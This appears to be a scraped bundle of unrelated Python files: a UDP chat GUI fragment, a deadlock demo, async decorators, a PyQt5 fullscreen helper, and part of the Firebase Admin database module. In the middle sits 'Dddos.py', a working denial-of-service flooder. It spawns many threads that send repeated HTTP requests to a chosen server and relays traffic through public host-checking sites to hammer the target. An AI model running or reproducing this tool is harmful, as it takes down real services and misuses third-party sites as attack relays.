self.host = gethostbyname(gethostname())
self.port = random.randint(5000, 25000)
self.addr = (self.host, self.port)
self.sock = socket(AF_INET, SOCK_DGRAM)
self.sock.bind(self.addr)
self.buffer = 8 * 1024
self.results = None
def get_host(self):
return self.host
def get_port(self):
return self.port
class MainWindow(Tk):
def __init__(self):
super().__init__()
self.current_page = None
self.title('File Transfer')
self.size = (350, 550)
self.switch_to_page(FirstPage)
self.geometry('450x650')
self.resizable(0, 0)
self.transfer_object=None # This is the object that is
# going to be transferred to the next frame
# This object can be Sender/ ReceiverConnection object
def switch_to_page(self, page):
new_page = page(self)
if self.current_page:
self.current_page.destroy()
self.current_page = new_page
self.current_page.pack(side=TOP, fill=X, expand=True)
class FirstPage(Frame):
def __init__(self, master):
super().__init__()
self.master = master
ttk.Label(self, text='First Page', font='"Product Sans" 28 bold').pack(side=TOP)
self.choice = StringVar()
# input('Pause..')
ttk.Radiobutton(self, text='Sender', variable=self.choice, value='sender', command=self.enablesubmit).pack()
ttk.Radiobutton(self, text='Receiver', variable=self.choice, value='receiver', command=self.enablesubmit).pack()
ttk.Button(self, text='Quit', command=self.master.quit).pack(side=BOTTOM)
self.submit_btn=ttk.Button(self, text='Submit', command=self.submit, state='disable') # Submit button
self.submit_btn.pack(side=BOTTOM)
def submit(self):
if self.choice.get() == 'sender':
self.master.switch_to_page(SenderPage)
elif self.choice.get() == 'receiver':
self.master.switch_to_page(ReceiverPage)
def enablesubmit(self):
self.submit_btn['state']='enable'
class SenderPage(Frame):
def __init__(self, master):
super().__init__()
self.master = master
self.Sender = SenderConnection()
# Add widgets
ttk.Label(self, text='Sender Page', font='"Product Sans" 22 bold').pack(side=TOP)
self.host_label=Label(self, text="Enter IP address in the box below: ")
self.host_label.pack()
self.host_entry = ttk.Entry(self, font='"Fira Code" 14', cursor='ibeam')
self.host_entry.focus()
self.host_entry.bind("<Return>", self.set_host)
self.host_entry.pack()
ttk.Separator(self).pack(fill=X)
self.port_label=Label(self, text="Enter port address in the box below: ")
self.port_label.pack()
self.port_entry = ttk.Entry(self, font='"Fira Code" 14', cursor='ibeam')
self.port_entry.bind("<Return>", self.set_port)
self.port_entry.pack()
self.show_host=Label(self, text="")
self.show_port=Label(self, text="")
self.show_host.pack()
self.show_port.pack()
ttk.Button(self, text='Quit', command=self.master.quit).pack(side=BOTTOM)
self.next_page=ttk.Button(self, text='Next', state='disable' ,command=self.next)
self.next_page.pack(side=BOTTOM)
def set_host(self, temp):
temp = self.host_entry.get()
host=self.Sender.validate_host(temp)
if host:
self.Sender.set_host(host)
self.host_entry.delete(0, END)
self.host_label['fg']='black'
self.host_label['text']=f'Target IP address is set to - {host}'
else:
self.host_label['fg']='red'
if self.Sender.host:
msg=f'IP address INVALID, still set to - {self.Sender.host}'
else:
msg='IP address INVALID, enter again!'
self.host_label['text']=msg
self.enable_next()
def set_port(self, temp):
temp = self.port_entry.get()
port= self.Sender.validate_port(temp)
if port:
self.Sender.set_port(port)
self.port_entry.delete(0, END)
self.port_label['fg']='black'
self.port_label['text']=f'Port address set to - {port}'
else:
self.port_label['fg']='red'
if self.Sender.port:
msg=f'Port number INVALID, port is still set to - {self.Sender.port}!'
else:
msg='Port number INVALID, enter again!'
self.port_label['text']=msg
self.enable_next()
def enable_next(self):
if self.Sender.host and self.Sender.port:
self.next_page['state'] = 'enable'
def next(self):
self.master.transfer_object=self.Sender # Transfer the object to the next frame
print('Going to the next page')
self.master.switch_to_page(SenderPage2)
class SenderPage2(Frame):
def __init__(self, master):
super().__init__()
self.master = master
self.Sender = self.master.transfer_object # Sender is now with this Frame
# Add Widgets
ttk.Label(self, text='Message Sender Page', font='"Product Sans" 20 bold').pack(side=TOP)
ttk.Label(self, text=f'Sending messages to {self.Sender.host}', font='"Product Sans" 12 bold').pack(side=TOP)
ttk.Label(self, text=f'On port {self.Sender.port}', font='"Product Sans" 10 italic').pack(side=TOP)
self.send_message_btn=ttk.Button(self, text='Send', command=self.send_message)
self.send_message_btn.pack(side=BOTTOM)
self.message_entry = ttk.Entry(self, cursor='ibeam')
self.message_entry.pack(side=BOTTOM, fill=X)
def send_message(self):
data=self.message_entry.get()
self.message_entry.delete(0, END)
self.Sender.send_data(data.encode())
print(data, 'sent to', self.Sender.addr)
class ReceiverPage(Frame):
def __init__(self, master):
super().__init__()
self.master = master
self.Receiver = ReceiverConnection()
self.thread_run = True # If set false, all running threads will close
# Add widgets
ttk.Label(self, text='Receiver Page', font='"Product Sans" 22 underline').pack(side=TOP)
ttk.Label(self, text=f'Your IP address is: {self.Receiver.get_host()}',
font='"Fira Code" 9').pack()
ttk.Label(self, text=f'Your port number is: {self.Receiver.get_port()}',
font='"Fira Code" 9').pack()
self.data_label = Label(self, text='', font='"Product Sans" 8 underline')
ttk.Button(self, text='Quit', command=self.close).pack(side=BOTTOM)
self.check_new_messages() # A function that checks for new messages in a thread
# t = Thread(target=self.Receiver.sock.recvfrom, args=(self.Receiver.buffer,))
# t.start()
def check_new_messages(self):
task = Thread(target=self.check_messages_helper)
task.start()
def check_messages_helper(self):
while True:
if not self.thread_run:
break
print('Listening on',self.Receiver.host)
data, addr = self.Receiver.sock.recvfrom(self.Receiver.buffer)
print('Got data-',data.decode())
other = gethostbyname(addr)
data = data.decode()
self.data_label['text'] = f'{other}: {data}'
def close(self):
self.thread_run = False
sys.exit()
m = MainWindow()
m.mainloop()
|
deadlock.py
|
import threading
import time
import logging
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
def acquire_a_b(a, b):
logging.info("t1 wants to acquire a")
a.acquire()
logging.info("t1 acquires a")
time.sleep(1)
logging.info("t1 wants to acquire b")
b.acquire()
logging.info("t1 acquires b")
a.release()
b.release()
def acquire_b_a(a, b):
logging.info("t2 wants to acquire b")
b.acquire()
logging.info("t2 acquires b")
time.sleep(1)
logging.info("t2 wants to acquire a")
a.acquire()
logging.info("t2 acquires a")
b.release()
a.release()
if __name__ == '__main__':
a = threading.Lock()
b = threading.Lock()
t1 = threading.Thread(target=acquire_a_b, args=(a, b))
t2 = threading.Thread(target=acquire_b_a, args=(a, b))
t1.start()
t2.start()
t1.join()
t2.join()
|
Dddos.py
|
import os
from queue import Queue
from optparse import OptionParser
import time, sys, socket, threading, logging, urllib.request, random
os.system ('clear')
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://ip-calculator.ru/siteip/?domain=")
bots.append("http://sitechecker.pro/app/main/project/598886/progress?guest_project_id=598886&guest_project_title=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://check-host.net/ip-info?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print ("\033[31m Успешно...\033[0m \033[92m <-- ip адрес упал --> \033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <-- Пакет отправлен --> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91m Нет соединение! сервер может быть выключен\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m
88888888ba, 88888888ba, 88888888ba, ,ad8888ba, ad88888ba
88 `"8b 88 `"8b 88 `"8b d8"' `"8b d8" "8b
88 `8b 88 `8b 88 `8b d8' `8b Y8,
88 88 88 88 88 88 88 88 `Y8aaaaa,
88 88 aaaaaaaa 88 88 88 88 88 88 `"""""8b,
88 8P """""""" 88 8P 88 8P Y8, ,8P `8b
88 .a8P 88 .a8P 88 .a8P Y8a. .a8P Y8a a8P
88888888Y"' 88888888Y"' 88888888Y"' `"Y8888Y"' "Y88888P"
Что бы запустить:
phyton3 Dddos.py -s ip адрес -p Порт -t 135
-s : Сервер ip
-p : Порт Дефолтный 80
-t : По умолчанию 135 \033[0m ''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# Чтение заголовка
global data
headers = open("hakddos.txt", "r")
data = headers.read()
headers.close()
#очередь задач q, w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," Порт: ",str(port)," Турбо: ",str(thr),"\033[0m")
print("\033[94m Пожалуйста, подождите...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91m Проверьте домен и порт сервера\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # если поток существует, он умирает
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # если поток существует, он умирает
t2.start()
start = time.time()
#многозадачность
item = 0
while True:
if (item>1800): # без сбоя памяти
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
asynx.py
|
from functools import wraps
from multiprocessing import Process, get_context
from multiprocessing.queues import Queue
from threading import Thread
import time
from multiprocessing import Lock
class BlockedQueue(Queue):
def __init__(self, maxsize=-1, block=True, timeout=None):
self.block = block
self.timeout = timeout
super().__init__(maxsize, ctx=get_context())
def put(self, obj, block=True, timeout=None):
super().put(obj, block=self.block, timeout=self.timeout)
def get(self, block=True, timeout=None):
if self.empty():
return None
return super().get(block=self.block, timeout=self.timeout)
def _execute(queue, f, *args, **kwargs):
try:
queue.put(f(*args, **kwargs))
except Exception as e:
queue.put(e)
def threaded(timeout=None, block=True):
def decorator(func):
queue = BlockedQueue(1, block, timeout)
@wraps(func)
def wrapper(*args, **kwargs):
args = (queue, func) + args
t = Thread(target=_execute, args=args, kwargs=kwargs)
t.start()
return queue.get()
return wrapper
return decorator
def processed(timeout=None, block=True):
def decorator(func):
queue = BlockedQueue(1, block, timeout)
@wraps(func)
def wrapper(*args, **kwargs):
args = (queue, func) + args
p = Process(target=_execute, args=args, kwargs=kwargs)
p.start()
return queue.get()
return wrapper
return decorator
def async_call(async_api=Thread, timeout=None, block=True):
def decorator(func):
queue = BlockedQueue(1, block, timeout)
@wraps(func)
def wrapper(*args, **kwargs):
args = (queue, func) + args
async = async_api(target=_execute, args=args, kwargs=kwargs)
async.start()
return queue.get()
return wrapper
return decorator
def scheduled(period, delay=None, loop_count=None):
delay = delay or 0
loop_count = loop_count or 0
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
counter = 0
time.sleep(delay)
while True:
start = time.time()
if loop_count and loop_count > 0:
if counter == loop_count:
break
counter += 1
func(*args, **kwargs)
run_time = time.time() - start
if run_time < period:
time.sleep(period - run_time)
return wrapper
return decorator
simple_lock = Lock()
def synchronized(lock=simple_lock):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return wrapper
return decorator
if __name__ == '__main__':
@threaded(block=False)
def test1(x):
time.sleep(x)
print("test 1")
@processed(block=False)
def test2(x):
time.sleep(x)
print("test 2")
@threaded(block=False)
@scheduled(period=2, loop_count=3)
def test3(x):
time.sleep(x)
print("test 3")
@threaded()
@scheduled(period=1, loop_count=2)
@processed()
def test_pow(x):
print(x * x)
@threaded()
@synchronized()
def lock_test_a():
print('lock_test_a')
@async_call(Thread)
@synchronized()
def lock_test_b():
print('lock_test_b')
test3(0)
test1(2)
test2(1)
test_pow(5)
lock_test_a()
lock_test_b()
|
pyqt5_fullscreen.py
|
import os
import sys
import tempfile
from multiprocessing import Process
import numpy as np
from PyQt5 import QtWidgets, QtGui, QtCore
def resize(image, size):
import importlib
is_pillow_available = importlib.util.find_spec("PIL") is not None
width, height = size
if is_pillow_available:
from PIL import Image
pil_img = Image.fromarray(image)
pil_img = pil_img.resize((width, height), Image.NEAREST)
return np.array(pil_img)
else:
import cv2
return cv2.resize(image, (width, height), interpolation=cv2.INTER_NEAREST)
class FullScreen:
"""Full-screen with PyQt5 backend
Caution! This FullScreen class is really TRICKY.
"""
def __init__(self):
app = QtWidgets.QApplication([])
screen = app.primaryScreen()
size = screen.size()
self.width = size.width()
self.height = size.height()
self.tmpdir_img = tempfile.TemporaryDirectory()
self.filename_img = os.path.join(self.tmpdir_img.name, "tmp_image.dat")
self.img = np.memmap(
self.filename_img, dtype=np.uint8, mode="w+", shape=self.shape
)
self.tmpdir_flag = tempfile.TemporaryDirectory()
self.filename_flag = os.path.join(self.tmpdir_flag.name, "tmp_flag.dat")
self.flag = np.memmap(
self.filename_flag, dtype=np.uint8, mode="w+", shape=(1)
)
# set initial image
img_gray = np.full(self.shape, 127, dtype=np.uint8)
self.imshow(img_gray)
# launch fullscreen app
self.p = Process(target=self._launch_fullscreen_app)
self.p.start()
@property
def shape(self):
return self.height, self.width, 3
def imshow(self, image):
if image.ndim == 2:
img_rgb = np.dstack([image] * 3) # Gray -> RGB
else:
img_rgb = image[:, :, ::-1] # BGR -> RGB
if img_rgb.shape != self.shape:
img_rgb = resize(img_rgb, (self.width, self.height))
self.img[:] = img_rgb[:]
self.flag[:] = True
def _launch_fullscreen_app(self):
class QWidgetFullScreen(QtWidgets.QLabel):
def __init__(self, filename_img, shape, filename_flag):
super().__init__()
self.img = np.memmap(
filename_img, dtype=np.uint8, mode="r", shape=shape
)
self.height, self.width, ch = self.img.shape
self.flag = np.memmap(
filename_flag, dtype=np.uint8, mode="r+", shape=(1)
)
self.update_image()
f = 60.0 # update rate Hz
timer = QtCore.QTimer(self)
timer.timeout.connect(self.update_image)
timer.start(1000.0 / f) # ms
self.setCursor(QtCore.Qt.BlankCursor)
self.showFullScreen()
def __del__(self):
# Close mmap objects
if hasattr(self, "img"):
self.img._mmap.close()
del self.img
if hasattr(self, "flag"):
self.flag._mmap.close()
del self.flag
def update_image(self):
if self.flag:
qt_img = QtGui.QImage(
self.img.flatten(),
self.width,
self.height,
QtGui.QImage.Format_RGB888,
)
self.setPixmap(QtGui.QPixmap.fromImage(qt_img))
self.update()
self.flag[:] = False
app = QtWidgets.QApplication([])
fullscreen_widget = QWidgetFullScreen(
self.filename_img, self.shape, self.filename_flag
)
sys.exit(app.exec_())
def destroyWindow(self):
self.__del__()
def __del__(self):
# Terminate fullscreen app
if hasattr(self, "p"):
if self.p is not None:
self.p.terminate()
del self.p
# Close mmap objects
if hasattr(self, "img"):
self.img._mmap.close()
del self.img
if hasattr(self, "flag"):
self.flag._mmap.close()
del self.flag
# Remove tmpfile
if hasattr(self, "tmpdir_img"):
self.tmpdir_img.cleanup()
if hasattr(self, "tmpdir_flag"):
self.tmpdir_flag.cleanup()
|
db.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Firebase Realtime Database module.
This module contains functions and classes that facilitate interacting with the Firebase Realtime
Database. It supports basic data manipulation operations, as well as complex queries such as
limit queries and range queries. However, it does not support realtime update notifications. This
module uses the Firebase REST API underneath.
"""
import collections
import json
import os
import sys
import threading
import google.auth
import requests
import six
from six.moves import urllib
import firebase_admin
from firebase_admin import exceptions
from firebase_admin import _http_client
from firebase_admin import _sseclient
from firebase_admin import _utils
_DB_ATTRIBUTE = '_database'
_INVALID_PATH_CHARACTERS = '[].?#$'
_RESERVED_FILTERS = ('$key', '$value', '$priority')
_USER_AGENT = 'Firebase/HTTP/{0}/{1}.{2}/AdminPython'.format(
firebase_admin.__version__, sys.version_info.major, sys.version_info.minor)
_TRANSACTION_MAX_RETRIES = 25
_EMULATOR_HOST_ENV_VAR = 'FIREBASE_DATABASE_EMULATOR_HOST'
def reference(path='/', app=None, url=None):
"""Returns a database ``Reference`` representing the node at the specified path.
If no path is specified, this function returns a ``Reference`` that represents the database
root. By default, the returned References provide access to the Firebase Database specified at
app initialization. To connect to a different database instance in the same Firebase project,
specify the ``url`` parameter.
Args:
path: Path to a node in the Firebase realtime database (optional).
app: An App instance (optional).
url: Base URL of the Firebase Database instance (optional). When specified, takes
precedence over the the ``databaseURL`` option set at app initialization.
Returns:
Reference: A newly initialized Reference.
Raises:
ValueError: If the specified path or app is invalid.
"""
service = _utils.get_app_service(app, _DB_ATTRIBUTE, _DatabaseService)
client = service.get_client(url)
return Reference(client=client, path=path)
def _parse_path(path):
"""Parses a path string into a set of segments."""
if not isinstance(path, six.string_types):
raise ValueError('Invalid path: "{0}". Path must be a string.'.format(path))
if any(ch in path for ch in _INVALID_PATH_CHARACTERS):
raise ValueError(
'Invalid path: "{0}". Path contains illegal characters.'.format(path))
return [seg for seg in path.split('/') if seg]
class Event(object):
"""Represents a realtime update event received from the database."""
def __init__(self, sse_event):
self._sse_event = sse_event
self._data = json.loads(sse_event.data)
@property
def data(self):
"""Parsed JSON data of this event."""
return self._data['data']
@property
def path(self):
"""Path of the database reference that triggered this event."""
return self._data['path']
@property
def event_type(self):
"""Event type string (put, patch)."""
return self._sse_event.event_type
class ListenerRegistration(object):
"""Represents the addition of an event listener to a database reference."""
def __init__(self, callback, sse):
"""Initializes a new listener with given parameters.
This is an internal API. Use the ``db.Reference.listen()`` method to start a
new listener.
Args:
callback: The callback function to fire in case of event.
sse: A transport session to make requests with.
"""
self._callback = callback
self._sse = sse
self._thread = threading.Thread(target=self._start_listen)
self._thread.start()
def _start_listen(self):
# iterate the sse client's generator
for sse_event in self._sse:
# only inject data events
if sse_event:
self._callback(Event(sse_event))
def close(self):
"""Stops the event listener represented by this registration
This closes the SSE HTTP connection, and joins the background thread.
"""
self._sse.close()
self._thread.join()
class Reference(object):
"""Reference represents a node in the Firebase realtime database."""
def __init__(self, **kwargs):
"""Creates a new Reference using the provided parameters.
This method is for internal use only. Use db.reference() to obtain an instance of
Reference.
"""
self._client = kwargs.get('client')
if 'segments' in kwargs:
self._segments = kwargs.get('segments')
else:
self._segments = _parse_path(kwargs.get('path'))
self._pathurl = '/' + '/'.join(self._segments)
@property
def key(self):
if self._segments:
return self._segments[-1]
return None
@property
def path(self):
return self._pathurl
@property
def parent(self):
if self._segments:
return Reference(client=self._client, segments=self._segments[:-1])
return None
def child(self, path):
"""Returns a Reference to the specified child node.
The path may point to an immediate child of the current Reference, or a deeply nested
child. Child paths must not begin with '/'.
Args:
path: Path to the child node.
Returns:
Reference: A database Reference representing the specified child node.
Raises:
ValueError: If the child path is not a string, not well-formed or begins with '/'.
"""
if not path or not isinstance(path, six.string_types):
raise ValueError(
'Invalid path argument: "{0}". Path must be a non-empty string.'.format(path))
if path.startswith('/'):
raise ValueError(
'Invalid path argument: "{0}". Child path must not start with "/"'.format(path))
full_path = self._pathurl + '/' + path
return Reference(client=self._client, path=full_path)
def get(self, etag=False, shallow=False):
"""Returns the value, and optionally the ETag, at the current location of the database.
Args:
etag: A boolean indicating whether the Etag value should be returned or not (optional).
shallow: A boolean indicating whether to execute a shallow read (optional). Shallow
reads do not retrieve the child nodes of the current database location. Cannot be
set to True if ``etag`` is also set to True.
Returns:
object: If etag is False returns the decoded JSON value of the current database location.
If etag is True, returns a 2-tuple consisting of the decoded JSON value and the Etag
associated with the current database location.
Raises:
ValueError: If both ``etag`` and ``shallow`` are set to True.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if etag:
if shallow:
raise ValueError('etag and shallow cannot both be set to True.')
headers, data = self._client.headers_and_body(
'get', self._add_suffix(), headers={'X-Firebase-ETag' : 'true'})
return data, headers.get('ETag')
else:
params = 'shallow=true' if shallow else None
return self._client.body('get', self._add_suffix(), params=params)
def get_if_changed(self, etag):
"""Gets data in this location only if the specified ETag does not match.
Args:
etag: The ETag value to be checked against the ETag of the current location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. If the ETag
specified by the caller did not match, the boolen value will be True and the JSON
and ETag values would reflect the corresponding values in the database. If the ETag
matched, the boolean value will be False and the other elements of the tuple will be
None.
Raises:
ValueError: If the ETag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not isinstance(etag, six.string_types):
raise ValueError('ETag must be a string.')
resp = self._client.request('get', self._add_suffix(), headers={'if-none-match': etag})
if resp.status_code == 304:
return False, None, None
else:
return True, resp.json(), resp.headers.get('ETag')
def set(self, value):
"""Sets the data at this location to the given value.
The value must be JSON-serializable and not None.
Args:
value: JSON-serializable value to be set at this location.
Raises:
ValueError: If the provided value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
self._client.request('put', self._add_suffix(), json=value, params='print=silent')
def set_if_unchanged(self, expected_etag, value):
"""Conditonally sets the data at this location to the given value.
Sets the data at this location to the given value only if ``expected_etag`` is same as the
ETag value in the database.
Args:
expected_etag: Value of ETag we want to check.
value: JSON-serializable value to be set at this location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. The boolean
indicates whether the set operation was successful or not. The decoded JSON and the
ETag corresponds to the latest value in this database location.
Raises:
ValueError: If the value is None, or if expected_etag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
# pylint: disable=missing-raises-doc
if not isinstance(expected_etag, six.string_types):
raise ValueError('Expected ETag must be a string.')
if value is None:
raise ValueError('Value must not be none.')
try:
headers = self._client.headers(
'put', self._add_suffix(), json=value, headers={'if-match': expected_etag})
return True, value, headers.get('ETag')
except exceptions.FailedPreconditionError as error:
http_response = error.http_response
if http_response is not None and 'ETag' in http_response.headers:
etag = http_response.headers['ETag']
snapshot = http_response.json()
return False, snapshot, etag
else:
raise error
def push(self, value=''):
"""Creates a new child node.
The optional value argument can be used to provide an initial value for the child node. If
no value is provided, child node will have empty string as the default value.
Args:
value: JSON-serializable initial value for the child node (optional).
Returns:
Reference: A Reference representing the newly created child node.
Raises:
ValueError: If the value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
output = self._client.body('post', self._add_suffix(), json=value)
push_id = output.get('name')
return self.child(push_id)
def update(self, value):
"""Updates the specified child keys of this Reference to the provided values.
Args:
value: A dictionary containing the child keys to update, and their new values.
Raises:
ValueError: If value is empty or not a dictionary.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not value or not isinstance(value, dict):
raise ValueError('Value argument must be a non-empty dictionary.')
if None in value.keys():
raise ValueError('Dictionary must not contain None keys.')
self._client.request('patch', self._add_suffix(), json=value, params='print=silent')
def delete(self):
"""Deletes this node from the database.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
self._client.request('delete', self._add_suffix())
def listen(self, callback):
"""Registers the ``callback`` function to receive realtime updates.
The specified callback function will get invoked with ``db.Event`` objects for each
realtime update received from the database. It will also get called whenever the SDK
reconnects to the server due to network issues or credential expiration. In general,
the OAuth2 credentials used to authorize connections to the server expire every hour.
Therefore clients should expect the ``callback`` to fire at least once every hour, even if
there are no updates in the database.
This API is based on the event streaming support available in the Firebase REST API. Each
call to ``listen()`` starts a new HTTP connection and a background thread. This is an
experimental feature. It currently does not honor the auth overrides and timeout settings.
Cannot be used in thread-constrained environments like Google App Engine.
Args:
callback: A function to be called when a data change is detected.
Returns:
ListenerRegistration: An object that can be used to stop the event listener.
Raises:
FirebaseError: If an error occurs while starting the initial HTTP connection.
"""
session = _sseclient.KeepAuthSession(self._client.credential, self._client.timeout)
return self._listen_with_session(callback, session)
def transaction(self, transaction_update):
"""Atomically modifies the data at this location.
Unlike a normal ``set()``, which just overwrites the data regardless of its previous state,
``transaction()`` is used to modify the existing value to a new value, ensuring there are
no conflicts with other clients simultaneously writing to the same location.
This is accomplished by passing an update function which is used to transform the current
value of this reference into a new value. If another client writes to this location before
the new value is successfully saved, the update function is called again with the new
current value, and the write will be retried. In case of repeated failures, this method
will retry the transaction up to 25 times before giving up and raising a
TransactionAbortedError. The update function may also force an early abort by raising an
exception instead of returning a value.
Args:
transaction_update: A function which will be passed the current data stored at this
location. The function should return the new value it would like written. If
an exception is raised, the transaction will be aborted, and the data at this
location will not be modified. The exceptions raised by this function are
propagated to the caller of the transaction method.
Returns:
object: New value of the current database Reference (only if the transaction commits).
Raises:
TransactionAbortedError: If the transaction aborts after exhausting all retry attempts.
ValueError: If transaction_update is not a function.
"""
if not callable(transaction_update):
raise ValueError('transaction_update must be a function.')
tries = 0
data, etag = self.get(etag=True)
while tries < _TRANSACTION_MAX_RETRIES:
new_data = transaction_update(data)
success, data, etag = self.set_if_unchanged(etag, new_data)
if success:
return new_data
tries += 1
raise TransactionAbortedError('Transaction aborted after failed retries.')
def order_by_child(self, path):
"""Returns a Query that orders data by child values.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Args:
path: Path to a valid child of the current Reference.
Returns:
Query: A database Query instance.
Raises:
